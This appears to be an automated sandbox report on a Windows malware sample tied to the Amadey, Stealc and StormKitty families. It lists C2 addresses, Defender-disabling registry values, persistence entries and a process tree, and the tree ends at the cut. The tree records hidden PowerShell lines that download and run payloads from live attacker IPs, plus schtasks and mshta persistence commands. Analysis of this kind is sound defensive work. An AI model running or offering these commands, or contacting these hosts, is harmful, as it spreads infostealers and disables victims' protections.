Analysis
- max time kernel: 145s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20250217-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20250217-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 06/03/2025, 01:21
Static task: static1
Behavioral task: behavioral1
- Sample: 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe
- Resource: win7-20241023-en
Behavioral task: behavioral2
- Sample: 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe
- Resource: win10v2004-20250217-en
General
- Target: 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe
- Size: 938KB
- MD5: 100bd6bacfe8cde2b3d01379c45e9282
- SHA1: 5af8a1c8556ee19da4a43d1c9a5fced8960fb751
- SHA256: 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c
- SHA512: b6e02ef0adde68a5dcbd707c8bbb4dd0ff705c48b53cc5b4d1ff4a6eec772668a2c80ee1a61bd6d9906a8ab9412ea7904d293281de4ad3afff5b782e444600ef
- SSDEEP: 24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8aylF:VTvC/MTQYxsWR7ayl
Malware Config
Extracted
- http://185.215.113.16/mine/random.exe
Extracted
- http://176.113.115.7/mine/random.exe
Extracted
- http://176.113.115.7/mine/random.exe
Extracted
- Family: amadey
- Version: 5.21
- Botnet: 092155
- C2: http://176.113.115.6
- install_dir: bb556cff4a
- install_file: rapes.exe
- strings_key: a131b127e996a898cd19ffb2d92e481b
- url_paths: /Ni9kiput/index.php
Extracted
- Family: stealc
- Botnet: trump
- C2: http://45.93.20.28
- url_path: /85a1cacf11314eb8.php
Signatures
Amadey family
Detects Healer, an antivirus disabler dropper 3 IoCs
- behavioral2/memory/5848-783-0x0000000000E10000-0x000000000125E000-memory.dmp: healer
- behavioral2/memory/5848-786-0x0000000000E10000-0x000000000125E000-memory.dmp: healer
- behavioral2/memory/5848-953-0x0000000000E10000-0x000000000125E000-memory.dmp: healer
Gcleaner family
Healer family
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" (dd29a77f54.exe)
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" (dd29a77f54.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" (dd29a77f54.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection (dd29a77f54.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" (dd29a77f54.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" (dd29a77f54.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" (dd29a77f54.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" (dd29a77f54.exe)
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
- Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications (dd29a77f54.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" (dd29a77f54.exe)
Stealc family
StormKitty
StormKitty is an open source info stealer written in C#.
StormKitty payload 2 IoCs
- behavioral2/files/0x0008000000023c8d-75.dat: family_stormkitty
- behavioral2/memory/2848-84-0x0000000000B50000-0x0000000000BE4000-memory.dmp: family_stormkitty
Stormkitty family
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
- Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ by: TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE, rapes.exe, TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE, 483d2fa8a0d53818306efeb32d3.exe, 561b99cbf5.exe, rapes.exe, 49309c0b92.exe, 1f3ecc566c.exe, a53c2ef5e2.exe, 3a82a50014.exe, 88J2R05CLKFFTOLX.exe, dd29a77f54.exe, rapes.exe
Blocklisted process makes network request 3 IoCs
- flow 11: PID 2896 powershell.exe
- flow 64: PID 4960 powershell.exe
- flow 65: PID 1180 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Runs PowerShell with its display window hidden.
- PID 2896 powershell.exe
- PID 4960 powershell.exe
- PID 1180 powershell.exe
- PID 4408 powershell.exe
- PID 4492 powershell.exe
- PID 1880 powershell.exe
Downloads MZ/PE file 16 IoCs
- flow 65: PID 1180 powershell.exe
- flow 33: PID 796 rapes.exe (6 entries)
- flow 90: PID 2392 BitLockerToGo.exe
- flow 109: PID 796 rapes.exe (3 entries)
- flow 233: PID 796 rapes.exe
- flow 123: PID 4288 a53c2ef5e2.exe
- flow 85: PID 4168 BitLockerToGo.exe
- flow 11: PID 2896 powershell.exe
- flow 64: PID 4960 powershell.exe
Checks BIOS information in registry 2 TTPs 26 IoCs
BIOS information is often read in order to detect sandboxing environments.
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion by: 49309c0b92.exe, rapes.exe, TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE, 483d2fa8a0d53818306efeb32d3.exe, 561b99cbf5.exe, 1f3ecc566c.exe, TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE, rapes.exe, a53c2ef5e2.exe, 3a82a50014.exe, 88J2R05CLKFFTOLX.exe, rapes.exe, dd29a77f54.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion by: dd29a77f54.exe, rapes.exe, TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE, 483d2fa8a0d53818306efeb32d3.exe, rapes.exe, 88J2R05CLKFFTOLX.exe, TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE, rapes.exe, a53c2ef5e2.exe, 3a82a50014.exe, 561b99cbf5.exe, 49309c0b92.exe, 1f3ecc566c.exe
Checks computer location settings 2 TTPs 7 IoCs
Looks up the country code configured in the registry, likely for geofencing.
- Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation by: rapes.exe, BUZd3Mq.exe, mshta.exe, mshta.exe, nhDLtPT.exe, mshta.exe, TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE
Executes dropped EXE 23 IoCs
- PID 2932 TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE
- PID 796 rapes.exe
- PID 4028 BUZd3Mq.exe
- PID 2848 Build.exe
- PID 4936 0c6733a3b9.exe
- PID 1116 TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE
- PID 2100 2asf3YX.exe
- PID 4148 483d2fa8a0d53818306efeb32d3.exe
- PID 4904 561b99cbf5.exe
- PID 636 5830bccfba.exe
- PID 1716 5830bccfba.exe
- PID 4324 rapes.exe
- PID 684 49309c0b92.exe
- PID 5008 1f3ecc566c.exe
- PID 4288 a53c2ef5e2.exe
- PID 1120 3a82a50014.exe
- PID 3464 68a19ce725.exe
- PID 1536 88J2R05CLKFFTOLX.exe
- PID 5848 dd29a77f54.exe
- PID 1424 2asf3YX.exe
- PID 3780 rapes.exe
- PID 5288 nhDLtPT.exe
- PID 5440 Gxtuum.exe
Identifies Wine through registry keys 2 TTPs 13 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
- Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine by: TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE, rapes.exe, TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE, 483d2fa8a0d53818306efeb32d3.exe, 49309c0b92.exe, 3a82a50014.exe, 561b99cbf5.exe, rapes.exe, 1f3ecc566c.exe, a53c2ef5e2.exe, 88J2R05CLKFFTOLX.exe, dd29a77f54.exe, rapes.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Windows security modification 2 TTPs 2 IoCs
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" (dd29a77f54.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features (dd29a77f54.exe)
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
- Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (Build.exe)
- Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (Build.exe)
- Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (Build.exe)
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 6 IoCs
All six values are set by rapes.exe under \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:
- Set value (str) Run\68a19ce725.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108770101\\68a19ce725.exe"
- Set value (str) Run\dd29a77f54.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108780101\\dd29a77f54.exe"
- Set value (str) Run\0c6733a3b9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\0c6733a3b9.exe"
- Set value (str) Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd"
- Set value (str) Run\a53c2ef5e2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108750101\\a53c2ef5e2.exe"
- Set value (str) Run\3a82a50014.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108760101\\3a82a50014.exe"
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 42: ipinfo.io
- flow 43: ipinfo.io
- flow 66: ip-api.com
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
- behavioral2/files/0x0008000000023cac-137.dat: autoit_exe
- behavioral2/files/0x0007000000023d3b-482.dat: autoit_exe
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
- PID 2932 TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE
- PID 796 rapes.exe
- PID 1116 TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE
- PID 4148 483d2fa8a0d53818306efeb32d3.exe
- PID 4904 561b99cbf5.exe
- PID 4324 rapes.exe
- PID 684 49309c0b92.exe
- PID 5008 1f3ecc566c.exe
- PID 4288 a53c2ef5e2.exe
- PID 1120 3a82a50014.exe
- PID 1536 88J2R05CLKFFTOLX.exe
- PID 5848 dd29a77f54.exe
- PID 3780 rapes.exe
Suspicious use of SetThreadContext 3 IoCs
- PID 636 (5830bccfba.exe) set thread context of PID 1716 (procid_target 150)
- PID 4904 (561b99cbf5.exe) set thread context of PID 4168 (procid_target 154)
- PID 684 (49309c0b92.exe) set thread context of PID 2392 (procid_target 157)
Drops file in Windows directory 2 IoCs
- File created C:\Windows\Tasks\rapes.job (TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE)
- File created C:\Windows\Tasks\Gxtuum.job (nhDLtPT.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
- Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh (netsh.exe)
- Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh (netsh.exe)
- Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh (netsh.exe)
- Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh (netsh.exe)
- Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh (netsh.exe)
- Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh (netsh.exe)
Program crash 2 IoCs
- PID 2304 WerFault.exe, pid_target 2848 (procid_target 105)
- PID 2488 WerFault.exe, pid_target 636 (procid_target 149)
System Location Discovery: System Language Discovery 1 TTPs 56 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
- PID 3152 cmd.exe
- PID 2804 netsh.exe
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz (firefox.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz (firefox.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (firefox.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 (Build.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier (Build.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 (2asf3YX.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier (2asf3YX.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (firefox.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature (firefox.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier (firefox.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision (firefox.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (firefox.exe)
Delays execution with timeout.exe 1 IoCs
- PID 4224 timeout.exe
Kills process with taskkill 5 IoCs
- PID 4824 taskkill.exe
- PID 3832 taskkill.exe
- PID 4072 taskkill.exe
- PID 4156 taskkill.exe
- PID 4408 taskkill.exe
Modifies registry class 2 IoCs
- Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings (firefox.exe)
- Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings (BUZd3Mq.exe)
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
- PID 1728 schtasks.exe
- PID 3272 schtasks.exe
- PID 3152 schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 17 IoCs
All entries are Token: SeDebugPrivilege.
- PID 2896 powershell.exe
- PID 2848 Build.exe
- PID 4960 powershell.exe
- PID 4408 powershell.exe
- PID 4492 powershell.exe
- PID 1880 powershell.exe
- PID 1180 powershell.exe
- PID 2100 2asf3YX.exe
- PID 636 5830bccfba.exe
- PID 4156 taskkill.exe
- PID 4408 taskkill.exe
- PID 4824 taskkill.exe
- PID 3832 taskkill.exe
- PID 4072 taskkill.exe
- PID 516 firefox.exe
- PID 516 firefox.exe
- PID 5848 dd29a77f54.exe
Suspicious use of FindShellTrayWindow 38 IoCs
Suspicious use of SendNotifyMessage 37 IoCs
Suspicious use of SetWindowsHookEx 1 IoCs
- PID 516 firefox.exe
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
outlook_office_path 1 IoCs
- Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (Build.exe)
outlook_win_path 1 IoCs
- Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (Build.exe)
Processes
-
C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe"C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn OdMxkmaweBS /tr "mshta C:\Users\Admin\AppData\Local\Temp\zbIoMqsNd.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn OdMxkmaweBS /tr "mshta C:\Users\Admin\AppData\Local\Temp\zbIoMqsNd.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1728
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\zbIoMqsNd.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE"C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe"C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Lappy.A.vbs"7⤵
- System Location Discovery: System Language Discovery
PID:4008
-
-
C:\Users\Admin\AppData\Local\Temp\Build.exe"C:\Users\Admin\AppData\Local\Temp\Build.exe"7⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:2848 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All8⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\SysWOW64\chcp.comchcp 650019⤵
- System Location Discovery: System Language Discovery
PID:3040
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile9⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2804
-
-
C:\Windows\SysWOW64\findstr.exefindstr All9⤵
- System Location Discovery: System Language Discovery
PID:1564
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2848 -s 24368⤵
- Program crash
PID:2304
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\SysWOW64\chcp.comchcp 650019⤵
- System Location Discovery: System Language Discovery
PID:1728
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid9⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1548
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe"C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn OXTLVmaes7i /tr "mshta C:\Users\Admin\AppData\Local\Temp\eZLOEW1ax.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn OXTLVmaes7i /tr "mshta C:\Users\Admin\AppData\Local\Temp\eZLOEW1ax.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3272
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\eZLOEW1ax.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'L15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4960 -
C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE"C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1116
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:1492 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:4072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:1416 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:4084 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "nVw3zmaCugA" /tr "mshta \"C:\Temp\C5jLSyw6s.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3152
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\C5jLSyw6s.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2760 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1180 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4148
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe"C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe"C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4904 -
